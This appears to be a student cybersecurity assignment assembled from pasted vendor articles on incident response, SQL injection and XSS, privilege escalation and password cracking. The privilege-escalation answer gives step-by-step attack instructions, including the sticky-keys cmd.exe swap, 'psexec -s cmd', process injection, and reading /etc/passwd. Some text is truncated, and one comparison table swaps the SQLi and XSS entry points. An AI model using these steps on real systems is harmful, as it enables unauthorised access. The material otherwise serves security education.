ASSIGNMENT-7 1. Case Study Question: Case Study: XYZ Corporation, a leading financial institution, recently experienced a security breach where sensitive customer data was compromised. As part of the incident response team (IRT), outline the steps you would take to address this incident effectively. Consider incident categorization, detection, communication plan, documentation, and legal/regulatory considerations in your response. Evaluate the importance of incident response planning in mitigating such incidents and maintaining trust with stakeholders. answer: An incident response plan is a documented, written plan with 6 distinct phases that helps IT professionals and staff recognize and deal with a cybersecurity incident like a data breach or cyber attack. Properly creating and managing an incident response plan involves regular updates and training. An hour glass representing the importance of an incident response plan Think You've Had a Data Breach? Request a Quote Is an incident response plan a PCI DSS requirement? Yes, Requirement 12 of the PCI DSS specifies the steps businesses must take relating to their incident response plan, including: 12.10.2–Test incident response plan at least annually 12.10.3–Assign certain employees to be available 24/7 to deal with incidences 12.10.4–Properly and regularly train the staff with incident response responsibilities 12.10.5–Set up alerts from intrusion-detection, intrusion-prevention, and file-integrity monitoring systems 12.10.6–Implement a process to update and manage the incident response plan per industry and organizational changes SEE ALSO: What are the 12 requirements of PCI DSS Compliance? How to create an incident response plan A timeline showing the 6 phases of an incident response plan An incident response plan should be set up to address a suspected data breach in a series of phases. Within each phase, there are specific areas of need that should be considered. The incident response phases are: Preparation Identification Containment Eradication Recovery Lessons Learned Let’s look at each phase in more depth and point out the items that you need to address. SEE ALSO: 6 Steps to Making an Incident Response Plan 1. Preparation This phase will be the work horse of your incident response planning, and in the end, the most crucial phase to protect your business. Part of this phase includes: Ensure your employees are properly trained regarding their incident response roles and responsibilities in the event of data breach Develop incident response drill scenarios and regularly conduct mock data breaches to evaluate your incident response plan. Ensure that all aspects of your incident response plan (training, execution, hardware and software resources, etc.) are approved and funded in advance Your response plan should be well documented, thoroughly explaining everyone’s roles and responsibilities. Then the plan must be tested in order to assure that your employees will perform as they were trained. The more prepared your employees are, the less likely they’ll make critical mistakes. Questions to address Has everyone been trained on security policies? Have your security policies and incident response plan been approved by appropriate management? Does the Incident Response Team know their roles and the required notifications to make? Have all Incident Response Team members participated in mock drills? SEE ALSO: 5 Things Your Incident Response Plan Needs Download Our Incident Response Plan White Paper 2. Identification This is the process where you determine whether you’ve been breached. A breach, or incident, could originate from many different areas. Questions to address When did the event happen? How was it discovered? Who discovered it? Have any other areas been impacted? What is the scope of the compromise? Does it affect operations? Has the source (point of entry) of the event been discovered? 3. Containment When a breach is first discovered, your initial instinct may be to securely delete everything so you can just get rid of it. However, that will likely hurt you in the long run since you’ll be destroying valuable evidence that you need to determine where the breach started and devise a plan to prevent it from happening again. Instead, contain the breach so it doesn’t spread and cause further damage to your business. If you can, disconnect affected devices from the Internet. Have short-term and long-term containment strategies ready. It’s also good to have a redundant system back-up to help restore business operations. That way, any compromised data isn’t lost forever. This is also a good time to update and patch your systems, review your remote access protocols (requiring mandatory multi-factor authentication), change all user and administrative access credentials and harden all passwords. Questions to address What’s been done to contain the breach short term? What’s been done to contain the breach long term? Has any discovered malware been quarantined from the rest of the environment? What sort of backups are in place? Does your remote access require true multi-factor authentication? Have all access credentials been reviewed for legitimacy, hardened and changed? Have you applied all recent security patches and updates? SEE ALSO: SecurityMetrics Learning Center 4. Eradication Once you’ve contained the issue, you need to find and eliminate the root cause of the breach. This means all malware should be securely removed, systems should again be hardened and patched, and updates should be applied. Whether you do this yourself, or hire a third party to do it, you need to be thorough. If any trace of malware or security issues remain in your systems, you may still be losing valuable data, and your liability could increase. Questions to address Have artifacts/malware from the attacker been securely removed? Has the system be hardened, patched, and updates applied? Can the system be re-imaged? 5. Recovery This is the process of restoring and returning affected systems and devices back into your business environment. During this time, it’s important to get your systems and business operations up and running again without the fear of another breach. Questions to address When can systems be returned to production? Have systems been patched, hardened and tested? Can the system be restored from a trusted back-up? How long will the affected systems be monitored and what will you look for when monitoring? What tools will ensure similar attacks will not reoccur? (File integrity monitoring, intrusion detection/protection, etc) 6. Lessons Learned Once the investigation is complete, hold an after-action meeting with all Incident Response Team members and discuss what you’ve learned from the data breach. This is where you will analyze and document everything about the breach. Determine what worked well in your response plan, and where there were some holes. Lessons learned from both mock and real events will help strengthen your systems against the future attacks. Questions to address What changes need to be made to the security? How should employee be trained differently? What weakness did the breach exploit? How will you ensure a similar breach doesn’t happen again? No one wants to go through a data breach, but it’s essential to plan for one. Prepare for it, know what to do when it happens, and learn all that you can afterwards. 2. Investigate the exploitation of vulnerabilities such as SQL injection and cross-site scripting (XSS) in ethical hacking scenarios. answer:SQL injection attack SQL injection is a common and prevalent method of attack that targets victims' databases through web applications. It enables cyberattackers to access, modify, or delete data, and thus manipulate the organization's databases. For any organization, data is one of the most critical and valuable assets, and an attack on its database can wreak havoc on the entire business. Data can include customer records, privileged or personal information, business-critical data, confidential data, or financial records of an organization. According to MITRE ATT&CK, cyberattackers often exploit public-facing applications to gain the initial foothold within an organization's network. These applications are generally websites but can also include databases like SQL. How does a SQL injection attack work? How does a SQL injection attack work? An SQL injection attack is carried out through the following steps: An attacker researches the targeted database. The attacker identifies vulnerabilities in the webpage or application to exploit. One example of an SQL vulnerability is insufficient user input validation. The attacker can create and submit their own input content by exploiting this vulnerability. They further create malicious SQL inputs and inject them into the standard SQL queries. This enables the attacker to carry out nefarious and malicious actions on the web application and exploit the database. They then can extract confidential information, bypass security controls, modify records, or delete the entire database. Cross-site scripting Cross-site scripting (XSS) attack is a popular attack technique used by hackers to target web applications. Here, the attackers inject malicious client-side scripts into a user's browsers or web pages, allowing them to download malware into the target user's system, impersonate the target, and carry out data exfiltration, session hijacking, changes in user settings, and more. According to MITRE ATT&CK, cross-site scripting is an example of a drive-by compromise technique used by adversaries to gain initial access within the network. The technique aims to exploit website vulnerabilities through malicious client side scripts or code. This provides them with access to systems on the internal network and also allows them to use compromised websites to direct the victims to malicious applications meant to steal and acquire Application Access Tokens (used to make authorized and legitimate API requests on behalf of users/services to access resources in cloud or SaaS applications). How does an XSS attack work? How does an XSS attack work? An XSS attack is carried out through the following steps: The attacker exploits the vulnerabilities of a website, such as using its form to inject a malicious script into the website's database. The malicious script gets saved in the database of the vulnerable website. The victim user requests a webpage from the website. The website database includes the malicious script in response to the requested webpage and sends it to the victim user. The malicious script gets activated every time the victim user performs any action on the webpage or visits the compromised website. The malicious script sends the victim's private data (such as session cookies) to the attacker's server. Types of XSS attack XSS is broadly categorized into three types, which are: Reflected XSS: The victim user (client) unknowingly sends a malicious script (payload) as part of the regular request to the vulnerable web application or website (server). As a response, the application will return the malicious script to the victim user, which upon loading, will execute the malicious script. Since the malicious script gets reflected back from the server to the client, it is called a reflected XSS. Stored XSS: The attacker stores payload into the compromised servers, which gets delivered as and when the user visits the website. Since the malicious script is stored in the web application, it is called a stored XSS. DOM-based XSS: The attacker exploits the vulnerability of those applications using a Document Object Model (DOM)—a programming web interface for web pages. The attacker injects the malicious script in the DOM through a URL for instance, and when the user performs any action on that page or visits the page through that URL, the application updates the DOM to execute the malicious script. Differences between SQL injection and XSS attack Even though both SQL injection and XSS attack are common web hacking techniques, there are a few key differences between the two. SQL injection attack Cross-site scripting attack Attack definition An attack technique where attackers target data-driven applications and compromise user/organization databases by performing certain actions. An attack technique where attackers execute malicious code in the victim users browsers which they can control. Entry point The initial access in SQL attack is achieved through drive-by compromise technique. The initial access in XSS attack is achieved through exploiting public-facing application technique. Attack technique The attacker injects malicious SQL queries into web form input field. The attacker injects malicious client-side scripts into webpages/websites. Impact Upon successful execution, the attacker can add, delete, or modify the existing database and bypass the security controls. Upon successful execution, the attacker can perform session hijacking, credential theft, data exfiltration, impersonate victim user, account hijacking, etc. Attack language The most common language used in the attack is SQL. The most common language used in the attack is JavaScript. Although SQL injection and cross-site scripting attack continue to be popular among attackers, continuous monitoring, testing, and deploying the best preventive measures will help organizations keep their websites from becoming prey to such attacks and neutralize any threats preemptively. 3. Discuss privilege escalation as a hacking technique, its implications, and preventive measures. answer:Privilege escalation is an attack vector that many businesses face due to loss of focus on permission levels. As a result, security controls are not sufficient to prevent a privilege escalation. Privilege escalation attacks occur when a threat actor gains access to an employee’s account, bypasses the proper authorization channel, and successfully grants themselves access to data they are not supposed to have. When deploying these attacks threat actors are typically attempting to exfiltrate data, disrupt business functions, or create backdoors. All of these actions can have a major impact on business continuity and should be considered when drafting a business continuity plan. When encounter a privilege escalation attack, how you respond is critical. Here are a few questions to consider: What did the attacker have permission and access to? How are business services currently being impacted? What other activities were performed on this account during the duration of the attack? What Are The Types Of Privilege Escalation Attacks? Not every attack will provide threat actors with full access to the targeted system. In these cases, a privilege escalation is required to achieve the desired outcome. There are two types of privilege escalation attacks including vertical and horizontal. Vertical Privilege Escalation Vertical privilege escalation occurs when an attacker gains access directly to an account with the intent to perform actions as that person. This type of attack is easier to pull off since there is no desire to elevate permissions. The goal here is to access an account to further spread an attack or access data the user has permissions to. Day in and day out I analyze numerous phishing emails that attempt to perform this attack. Whether it’s a “bank”, “Amazon”, or any other countless number of ecommerce sites, the attack is the same. “Your account will be deactivated due to inactivity. Please click this link and login to keep your account active.” This is, however, one example of many cookie-cutter phishing templates seen in “the wild”. Horizontal Privilege Escalation Horizontal privilege escalation is a bit tricky to pull off as it requires the attacker to gain access to the account credentials as well as elevating the permissions. This type of attack tends to require a deep understanding of the vulnerabilities that affect certain operating systems or the use of hacking tools. Phishing campaigns have been used to perform the first part of the attack to gain access to the account. When it comes to elevating permissions, the attacker has a few options to choose from. One option is to exploit vulnerabilities in the operating system to gain system or root-level access. The next option would be to use hacking tools, like Metasploit, to make the job a bit easier. Automated patch management services Examples Of Privilege Escalation Attacks Now that you have a better understanding of what a privilege escalation attack is, I’m going to show you 5 real-world examples including: Windows Sticky Keys Windows Sysinternals Process Injection Linux Passwd User Enumeration Android Metasploit Windows Sticky Keys When attempting a privilege escalation attack on Windows, I like to start with a “sticky key” attack. This attack is fairly easy to perform and does not require any sort of advanced skillset to pull it off. To perform this attack you will need physical access to the machine and ability to boot to a repair disk. Once booted, you will have to change the system file associated with the sticky key function (tapping the shift key 5 times). Windows Sticky Keys - Privilege Escalation Attacks From a command prompt, you will make a copy of the file located at %systemroot%\system32. Next, all you have to do is copy the to %systemroot%\system32 with the file name . After the command prompt’s executable has been saved to the correct location, reboot. Once at the logon screen, tap the shift key 5 times to activate “sticky keys” and you should be presented with a command prompt with system level access. From this level of access, an attacker can create a backdoor in to the system by creating a local administrator account. Windows Sysinternals Another common method of privilege escalation in windows is through the use of the Sysinternals tool suite. After an attacker gains a backdoor into the system using the “Sticky Keys” method, they can further escalate their privileges to system access. This attack method requires the use of the Psexec command as well as local administrative rights to the machine. Windows Sysinternals – Privilege Escalation Attacks After logging in with the backdoor account, which in my case is “fakeadmin”, I simply use the psexec.exe tool to escalate my permissions to system access. This is done by using the command “psexec.exe –s cmd”. Process Injection Working against weak processes is another method that I use for privilege escalation. One tool that I have seen used in penetration testing is Process Injector. This tool has the capabilities to enumerate all running processes on a system as well as the account running the process. Process Injection - Privilege Escalation Attacks In order to pull this attack off, you will need access to an account with higher permission levels. After you identify the process you want to inject in to, for example, cmd.exe, run a command like pinjector.exe –p cmd.exe . Linux Passwd User Enumeration A basic privilege escalation attack that is common in Linux is conducted through enumerating the user accounts on the machine. This attack requires the attacker to access the shell of the system. This is commonly done through misconfigured ftp servers. Linux Passwd User Enumeration - Privilege Escalation Attacks Once the attacker has gained access to the shell, the command “cat /etc/passwd | cut –d: -f1” will list all users on the machine. Android and Metasploit Metasploit is a well-known tool to most hackers and contains a library of known exploits. In the case of Android devices, Metasploit can be used against rooted Android devices. Once an Android device is rooted a SU binary becomes available which allows commands to be ran as root. The example below shows how this exploit can be ran to run “show options” and “show advanced” as root. Android and Metasploit - Privilege Escalation Attacks How To Prevent A Privilege Escalation Attack Unfortunately, users are the weakest link in the security chain. With just a single click, they could compromise a system or network. To mitigate this risk, businesses implement security awareness programs along with a methodology for validating the effectiveness of the training. In most cases, phishing simulation software, like KnowBe4, GoPhish, or Phishme can adequately train users to identify phishing email attempts. Privilege escalation, like other cyber attacks, takes advantage of system and process vulnerabilities. In order to prevent these attacks, consider implementing proper processes for patch management, new software development/implementation, and user account modification requests as well as an automated tool to monitor for such changes. Implementing these process will give you the proper safeguards in place to prevent or deter and attacker from attempting privilege escalation. Finally, an intrusion detection system (IDS) and/or intrusion prevention system (IPS) provides an additional layer of security to derail attempts at escalating privileges. New exploits are being created daily and it is our responsibility to ensure we protect ourselves from the attack. A proper patch management process will help ensure all systems and applications are current with the latest patches. During the quest for new and improved software, we must not forget to include security in the process. Oftentimes, security is set aside to meet the business or client needs. Software code reviews or vendor management processes will help keep security in the loop and strengthen your development practices. During the attack, the attacker may try to elevate their permissions with a phone call or service ticket request to the helpdesk. Without a proper process in place to validate the user’s request, this may go unnoticed until an access level review is conducted. To prevent this elevation of permissions, develop a 4. Explain the process of password cracking and discuss its ethical implications. answer:Password cracking typically refers to the process of recovering scrambled passwords. It can be used to help a user get back a forgotten password or to help a system administrator check for weak passwords. But more often, password cracking is used by bad actors to gain unauthorized access to systems and resources. As an attack vector, password cracking is incredibly varied. Threat actors use specialized tools, multiple techniques and even blend complimentary tactics to boost their chances of success. To get a clearer picture of how they all fit together, it helps to understand that attacks typically fall into two categories: Password guessing Password cracking Strictly speaking, password guessing and password cracking are not the same thing, even though the terms are often conflated. Password guessing is an online technique where a bad actor uses various combinations of characters in a process of trial and error. In contrast, password cracking refers to an offline process where an attacker attempts to decipher plaintext passwords from their encrypted forms. Because these techniques are typically lumped together, we’re covering both of them here. 5 Common password cracking techniques While there are multiple ways that threat actors crack passwords, here are a few of the most common: 1. Brute-force attack With this relatively old but effective attack method, bad actors use automated scripts to try out possible passwords until the correct one works. Brute-force attacks can be very time consuming because they take a systematic approach to trying all possible permutations of characters in a sequence. The longer the password, the longer it takes. Brute-force attacks are most successful when users have common or weak passwords, which can be “guessed” by tools in a matter of seconds. Cracking a strong password might take a few hours or days. Admins who want to defend against to these attacks have several options, including: Limiting the number of times a password can be tried Blocking an IP address after it has attempted—and failed—to enter the correct password after a certain number of times Locking accounts after a certain number of unsuccessful login attempts Imposing a time delay between attempts Increasing the level of effort, like adding a CAPTCHA or adding multifactor authentication 2. Dictionary attack These attacks are similar to brute-force attacks, but they’re less about quantity and more about quality. In other words, instead of trying every possible combination, bad actors start with the assumption that users are likely to follow certain patterns when they create a password. So they will home in on the most likely words rather than trying everything. Some users pick easy to remember passwords, like “password” or “123abc.” Others follow predictable patterns that can vary by region—users might pick words related to their favorite sports teams, local landmarks, city names, and so on. So, for example, a New Yorker might choose “yankeefan1998.” Attackers collect lists of likely passwords into attack dictionaries. Then, they augment likely passwords with numbers, letters and characters for longer passwords. While these lists aren’t as long as those used in brute-force attacks, they can be quite large. So attackers use automated scripts to try each password on a username until they’re locked out. 3. Credential stuffing attack With credential stuffing, bad actors take advantage the tendency for users to reuse the same usernames and passwords for multiple accounts. As more credentials are exposed through data breaches, the opportunity for these types of attacks is growing. Here’s how it works. Pairs of compromised usernames and passwords are added to a botnet that automates the process of trying those credentials on multiple sites at the same time. The purpose of these attacks is to identify account combinations that work and can be re-used across multiple sites. These attacks have a relatively low success rate, but the impact of a large-scale botnet attack is often anything but small. 4. Hybrid attack When users change their password, they’ll often add a few extra numbers, letters or characters at the end. Hybrid attacks take advantage of this tendency. Often, hybrid attacks are a mix of dictionary attacks and brute force. In this case, a bad actor may get a user’s compromised password for one site. The user learns it has been compromised and changes it. The attacker will now try out variations of the old password using a brute force method that automates the additions of numbers, letters and more. While this method is more time-consuming than a simple dictionary attack, it’s faster than a brute-force attack. 5. Rainbow table attack To keep passwords safe, any responsible organization that stores passwords won’t keep them in their original plaintext form. Rather, they use a hashing algorithm to convert passwords into a string of seemingly random letters and numbers. They might even hash this output a second time in a process called “salting” to make the password even more difficult to crack. But there are only a limited number of hashing algorithms. And they hash the same passwords the same way every time. As a result, attackers can develop databases of common passwords that they’ve been able to decode. Once they have deciphered a password, they store it in a database called a rainbow table. When attacker gets a new hashed password, they check to see if it matches any of the precomputed hashes stored in their rainbow table. The downside to rainbow tables is that they take considerable time and effort to create. And they often don’t work on passwords that have been salted. Tips to protect your organization against password attacks Safe passwords may seem like a trivial piece of your cybersecurity strategy. But passwords are the most common way that cyber criminals gain unauthorized access to confidential data and systems. That makes strong passwords essential to keeping your organization safe. All types of businesses, organizations and institutions can benefit from these password best practices: Create strong password policies. Users don’t typically have the best password hygiene. Consider a password policy that requires a minimum passphrase length (ideally greater than 20 characters), requires the use of special characters, and forces users to reset their passwords regularly. Use multifactor authentication. When MFA is used, password cracking is mostly neutralized (though a growing number of attacks employ MFA-bypass techniques). An attacker might figure out a user’s password, but in many cases, they still won’t have access to the secondary authentication method. Encrypt, hash and salt passwords. Both encrypting and hashing exponentially increase the effort and the computing power that’s required for attacks. And salting makes the process that even harder. Update systems regularly. When systems aren’t updated, malware that tracks users’ keystrokes can infect emails, files and applications. In these so-called keystroke attacks, bad actors gather user credentials and other sensitive information. Updated systems can prevent these attacks. By implementing these measures, organizations can effectively stop sensitive information from ending up in the wrong hands. The future of password security There’s no doubt that passwords have security issues. That’s why the popularity of password-less authentication is on the rise. Password-less authentication is generally believed to be more secure than standard passwords. It works by enabling users to prove they are who they say they are by matching them with something unique to them, like their voice or a security token. These security methods are commonly used with two-factor authentication (2FA). Here are a few examples: Biometrics. With this method, a user’s unique characteristics, like their fingerprint, palmprint, voice or face, are saved and encrypted. When a user wants to log in, they verify who they are by resubmitting their biometrics. Time-based one-time password (TOTP). This a temporary passcode is generated by an algorithm. They are typically six characters long and change after 30 or 60 seconds. Google Authenticator and Microsoft Authenticator are two good examples. In another variation, the user scans a QR code using a specific smartphone application—and then that app generates the TOTP for the user. One-time pin (OTP). When a user attempts to login, an OTP—typically a six-digit code—is sent to their cell phone number via short message service (SMS) or email. The user has a limited amount of time to enter that code in the system. In another variation, a unique hyperlink is sent to the user who then clicks that so-called magic link to login. Push notifications. This method authenticates a user by sending a message to a secure application on their mobile device. When the user gets the notification, they can approve or deny access or view more details. Password-less authentication is resistant to most password cracking methods. Plus, it alerts users if something is wrong. The disadvantages are that it’s more complex and often requires outside systems to function. So while the future of password security is moving towards being more secure, it’s not necessarily more user-friendly. How Proofpoint can help Proofpoint TAP Account Takeover helps businesses defend their email and cloud environments from threats, including: Brute-force attacks Phishing Business email compromise (BEC) Malware Data exfiltration Attackers’ persistent access Our solution provides insight into what types of threats are targeting email accounts. And, if an attacker manages to gain access to an account, it gives you the tools to take corrective action to protect that account.